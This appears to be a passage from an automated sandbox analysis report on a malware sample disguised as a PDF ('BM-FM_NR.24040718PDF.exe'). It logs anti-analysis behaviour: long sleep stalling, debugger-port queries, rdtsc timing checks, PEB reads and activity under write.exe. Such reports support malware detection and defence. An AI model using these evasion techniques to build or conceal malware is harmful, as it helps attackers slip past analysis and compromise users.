        Source: C:\Windows\SysWOW64\write.exe TID: 1580Thread sleep count: 9050 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\write.exe TID: 1580Thread sleep time: -18100000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316Thread sleep count: 39 > 30Jump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316Thread sleep time: -58500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316Thread sleep count: 58 > 30Jump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316Thread sleep time: -58000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FDB810 FindFirstFileW,FindNextFileW,FindClose,5_2_02FDB810
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13535224569.0000000006905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-4276
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-4126
        Source: C:\Windows\SysWOW64\write.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21763 rdtsc 2_2_36B21763
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B234E0 NtCreateMutant,LdrInitializeThunk,2_2_36B234E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5D69D mov eax, dword ptr fs:[00000030h]2_2_36B5D69D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB3690 mov eax, dword ptr fs:[00000030h]2_2_36BB3690
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F68C mov eax, dword ptr fs:[00000030h]2_2_36B9F68C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD96E0 mov eax, dword ptr fs:[00000030h]2_2_36AD96E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD96E0 mov eax, dword ptr fs:[00000030h]2_2_36AD96E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE56E0 mov eax, dword ptr fs:[00000030h]2_2_36AE56E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE56E0 mov eax, dword ptr fs:[00000030h]2_2_36AE56E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE56E0 mov eax, dword ptr fs:[00000030h]2_2_36AE56E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B756E0 mov eax, dword ptr fs:[00000030h]2_2_36B756E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B756E0 mov eax, dword ptr fs:[00000030h]2_2_36B756E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B836E0 mov eax, dword ptr fs:[00000030h]2_2_36B836E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B836E0 mov eax, dword ptr fs:[00000030h]2_2_36B836E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B836E0 mov eax, dword ptr fs:[00000030h]2_2_36B836E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B836E0 mov eax, dword ptr fs:[00000030h]2_2_36B836E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B836E0 mov eax, dword ptr fs:[00000030h]2_2_36B836E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0D6D0 mov eax, dword ptr fs:[00000030h]2_2_36B0D6D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE5622 mov eax, dword ptr fs:[00000030h]2_2_36AE5622
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE5622 mov eax, dword ptr fs:[00000030h]2_2_36AE5622
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE7623 mov eax, dword ptr fs:[00000030h]2_2_36AE7623
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1F63F mov eax, dword ptr fs:[00000030h]2_2_36B1F63F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1F63F mov eax, dword ptr fs:[00000030h]2_2_36B1F63F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8D62C mov ecx, dword ptr fs:[00000030h]2_2_36B8D62C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8D62C mov ecx, dword ptr fs:[00000030h]2_2_36B8D62C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8D62C mov eax, dword ptr fs:[00000030h]2_2_36B8D62C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B91623 mov eax, dword ptr fs:[00000030h]2_2_36B91623
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B91623 mov eax, dword ptr fs:[00000030h]2_2_36B91623
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B91623 mov eax, dword ptr fs:[00000030h]2_2_36B91623
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0D600 mov eax, dword ptr fs:[00000030h]2_2_36B0D600
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0D600 mov eax, dword ptr fs:[00000030h]2_2_36B0D600
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B69603 mov eax, dword ptr fs:[00000030h]2_2_36B69603
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F607 mov eax, dword ptr fs:[00000030h]2_2_36B9F607
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1360F mov eax, dword ptr fs:[00000030h]2_2_36B1360F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h]2_2_36B73608
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h]2_2_36B73608
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h]2_2_36B73608
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h]2_2_36B73608
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h]2_2_36B73608
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h]2_2_36B73608
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF3660 mov eax, dword ptr fs:[00000030h]2_2_36AF3660
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF3660 mov eax, dword ptr fs:[00000030h]2_2_36AF3660
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF3660 mov eax, dword ptr fs:[00000030h]2_2_36AF3660
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD7662 mov eax, dword ptr fs:[00000030h]2_2_36AD7662
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD7662 mov eax, dword ptr fs:[00000030h]2_2_36AD7662
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD7662 mov eax, dword ptr fs:[00000030h]2_2_36AD7662
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B75660 mov eax, dword ptr fs:[00000030h]2_2_36B75660
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6166E mov eax, dword ptr fs:[00000030h]2_2_36B6166E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6166E mov eax, dword ptr fs:[00000030h]2_2_36B6166E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6166E mov eax, dword ptr fs:[00000030h]2_2_36B6166E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B15654 mov eax, dword ptr fs:[00000030h]2_2_36B15654
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADD64A mov eax, dword ptr fs:[00000030h]2_2_36ADD64A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADD64A mov eax, dword ptr fs:[00000030h]2_2_36ADD64A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE3640 mov eax, dword ptr fs:[00000030h]2_2_36AE3640
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF640 mov eax, dword ptr fs:[00000030h]2_2_36AFF640
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF640 mov eax, dword ptr fs:[00000030h]2_2_36AFF640
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF640 mov eax, dword ptr fs:[00000030h]2_2_36AFF640
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE965A mov eax, dword ptr fs:[00000030h]2_2_36AE965A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE965A mov eax, dword ptr fs:[00000030h]2_2_36AE965A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB17BC mov eax, dword ptr fs:[00000030h]2_2_36BB17BC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAD7A7 mov eax, dword ptr fs:[00000030h]2_2_36BAD7A7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAD7A7 mov eax, dword ptr fs:[00000030h]2_2_36BAD7A7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAD7A7 mov eax, dword ptr fs:[00000030h]2_2_36BAD7A7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B11796 mov eax, dword ptr fs:[00000030h]2_2_36B11796
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B11796 mov eax, dword ptr fs:[00000030h]2_2_36B11796
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB781 mov eax, dword ptr fs:[00000030h]2_2_36BBB781
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB781 mov eax, dword ptr fs:[00000030h]2_2_36BBB781
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h]2_2_36AE37E4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h]2_2_36AE37E4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h]2_2_36AE37E4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h]2_2_36AE37E4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h]2_2_36AE37E4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h]2_2_36AE37E4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h]2_2_36AE37E4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE77F9 mov eax, dword ptr fs:[00000030h]2_2_36AE77F9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE77F9 mov eax, dword ptr fs:[00000030h]2_2_36AE77F9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F7CF mov eax, dword ptr fs:[00000030h]2_2_36B9F7CF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B09723 mov eax, dword ptr fs:[00000030h]2_2_36B09723
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB705 mov eax, dword ptr fs:[00000030h]2_2_36ADB705
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB705 mov eax, dword ptr fs:[00000030h]2_2_36ADB705
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB705 mov eax, dword ptr fs:[00000030h]2_2_36ADB705
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB705 mov eax, dword ptr fs:[00000030h]2_2_36ADB705
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED700 mov ecx, dword ptr fs:[00000030h]2_2_36AED700
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F717 mov eax, dword ptr fs:[00000030h]2_2_36B9F717
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA970B mov eax, dword ptr fs:[00000030h]2_2_36BA970B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA970B mov eax, dword ptr fs:[00000030h]2_2_36BA970B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB3700 mov eax, dword ptr fs:[00000030h]2_2_36BB3700
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB3700 mov eax, dword ptr fs:[00000030h]2_2_36BB3700
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB3700 mov eax, dword ptr fs:[00000030h]2_2_36BB3700
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F773 mov eax, dword ptr fs:[00000030h]2_2_36B9F773
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h]2_2_36B21763
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h]2_2_36B21763
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h]2_2_36B21763
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h]2_2_36B21763
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h]2_2_36B21763
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h]2_2_36B21763
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B13740 mov eax, dword ptr fs:[00000030h]2_2_36B13740
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h]2_2_36ADF75B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h]2_2_36ADF75B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h]2_2_36ADF75B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h]2_2_36ADF75B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h]2_2_36ADF75B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h]2_2_36ADF75B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h]2_2_36ADF75B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h]2_2_36ADF75B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h]2_2_36ADF75B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1174A mov eax, dword ptr fs:[00000030h]2_2_36B1174A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6174B mov eax, dword ptr fs:[00000030h]2_2_36B6174B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6174B mov ecx, dword ptr fs:[00000030h]2_2_36B6174B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B954B0 mov eax, dword ptr fs:[00000030h]2_2_36B954B0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B954B0 mov ecx, dword ptr fs:[00000030h]2_2_36B954B0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6D4A0 mov ecx, dword ptr fs:[00000030h]2_2_36B6D4A0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6D4A0 mov eax, dword ptr fs:[00000030h]2_2_36B6D4A0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6D4A0 mov eax, dword ptr fs:[00000030h]2_2_36B6D4A0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1B490 mov eax, dword ptr fs:[00000030h]2_2_36B1B490
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1B490 mov eax, dword ptr fs:[00000030h]2_2_36B1B490
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h]2_2_36B85490
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h]2_2_36B85490
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h]2_2_36B85490
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h]2_2_36B85490
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h]2_2_36B85490
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h]2_2_36B85490
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h]2_2_36B85490
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F4FD mov eax, dword ptr fs:[00000030h]2_2_36B9F4FD
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B094FA mov eax, dword ptr fs:[00000030h]2_2_36B094FA
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B154E0 mov eax, dword ptr fs:[00000030h]2_2_36B154E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h]2_2_36B0F4D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h]2_2_36B014C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h]2_2_36B014C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h]2_2_36B014C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h]2_2_36B014C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h]2_2_36B014C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D430 mov eax, dword ptr fs:[00000030h]2_2_36B9D430
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D430 mov eax, dword ptr fs:[00000030h]2_2_36B9D430
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB420 mov eax, dword ptr fs:[00000030h]2_2_36ADB420
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B17425 mov eax, dword ptr fs:[00000030h]2_2_36B17425
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B17425 mov ecx, dword ptr fs:[00000030h]2_2_36B17425
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7B420 mov eax, dword ptr fs:[00000030h]2_2_36B7B420
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7B420 mov eax, dword ptr fs:[00000030h]2_2_36B7B420
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h]2_2_36B6F42F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h]2_2_36B6F42F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h]2_2_36B6F42F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h]2_2_36B6F42F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h]2_2_36B6F42F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B69429 mov eax, dword ptr fs:[00000030h]2_2_36B69429
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F409 mov eax, dword ptr fs:[00000030h]2_2_36B9F409
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F478 mov eax, dword ptr fs:[00000030h]2_2_36B9F478
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD7460 mov eax, dword ptr fs:[00000030h]2_2_36AD7460
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD7460 mov eax, dword ptr fs:[00000030h]2_2_36AD7460
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1D450 mov eax, dword ptr fs:[00000030h]2_2_36B1D450
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1D450 mov eax, dword ptr fs:[00000030h]2_2_36B1D450
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B87591 mov edi, dword ptr fs:[00000030h]2_2_36B87591
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B19580 mov eax, dword ptr fs:[00000030h]2_2_36B19580
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B19580 mov eax, dword ptr fs:[00000030h]2_2_36B19580
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h]2_2_36B8B58B
